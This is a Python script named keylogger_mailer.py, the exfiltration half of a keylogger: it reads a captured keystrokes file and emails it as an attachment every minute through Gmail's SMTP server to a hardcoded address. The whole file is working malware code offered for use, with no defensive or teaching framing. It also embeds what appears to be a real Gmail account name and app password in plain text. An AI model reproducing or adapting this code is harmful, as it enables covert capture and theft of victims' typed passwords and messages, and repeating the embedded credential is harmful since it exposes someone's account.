# keylogger_mailer.py

import smtplib
import os
import time
from email.message import EmailMessage

# ----------------------------
# Configuration
# ----------------------------

# Path to the keystrokes file generated by keyloggers.py
FILE_PATH = '/workspaces/Keyloggers/keystrokes.txt'

# How often to send (in seconds)
SEND_INTERVAL_SECONDS = 60  # 1 minute

# SMTP server settings (replace with your own SMTP info)
SMTP_SERVER   = 'smtp.gmail.com'            # e.g. 'smtp.gmail.com' for Gmail
SMTP_PORT     = 587                           # 587 for STARTTLS, 465 for SSL
SMTP_USERNAME = 'rai230404@gmail.com'   # your SMTP username
SMTP_PASSWORD = 'wauj josb nkwz qlnc'    # your SMTP password or app-specific password

# Recipient email address
RECIPIENT_EMAIL = 'rai230404@gmail.com'


# ----------------------------
# Function: Send keystrokes file as email attachment
# ----------------------------
def send_keystrokes(file_path: str, recipient: str) -> None:
    """
    Reads the keystrokes file at file_path and emails it to recipient.
    """
    if not os.path.isfile(file_path):
        print(f"❌  File not found: {file_path}")
        return

    msg = EmailMessage()
    msg['Subject'] = 'Keylogger Keystrokes Log'
    msg['From'] = SMTP_USERNAME
    msg['To'] = recipient
    msg.set_content('Attached is the latest keystrokes log.')

    with open(file_path, 'rb') as f:
        data = f.read()
    filename = os.path.basename(file_path)
    msg.add_attachment(
        data,
        maintype='text',
        subtype='plain',
        filename=filename
    )

    try:
        with smtplib.SMTP(SMTP_SERVER, SMTP_PORT) as server:
            server.ehlo()
            server.starttls()
            server.login(SMTP_USERNAME, SMTP_PASSWORD)
            server.send_message(msg)
        print(f"✔️  Sent '{filename}' to {recipient}")
    except Exception as e:
        print(f"❌  Failed to send email: {e}")


# ----------------------------
# Main loop
# ----------------------------
def main():
    # Verify keystrokes file exists before starting
    if not os.path.isfile(FILE_PATH):
        print(f"❌  The specified keystrokes file does not exist: {FILE_PATH}")
        print("    → Make sure keyloggers.py is generating keystrokes.txt at that path.")
        return

    print(f"▶️  Starting to send '{FILE_PATH}' every {SEND_INTERVAL_SECONDS} seconds to {RECIPIENT_EMAIL}.")
    while True:
        send_keystrokes(FILE_PATH, RECIPIENT_EMAIL)
        print(f"⏱️  Waiting {SEND_INTERVAL_SECONDS} seconds before next send...\n")
        time.sleep(SEND_INTERVAL_SECONDS)


if __name__ == '__main__':
    main()
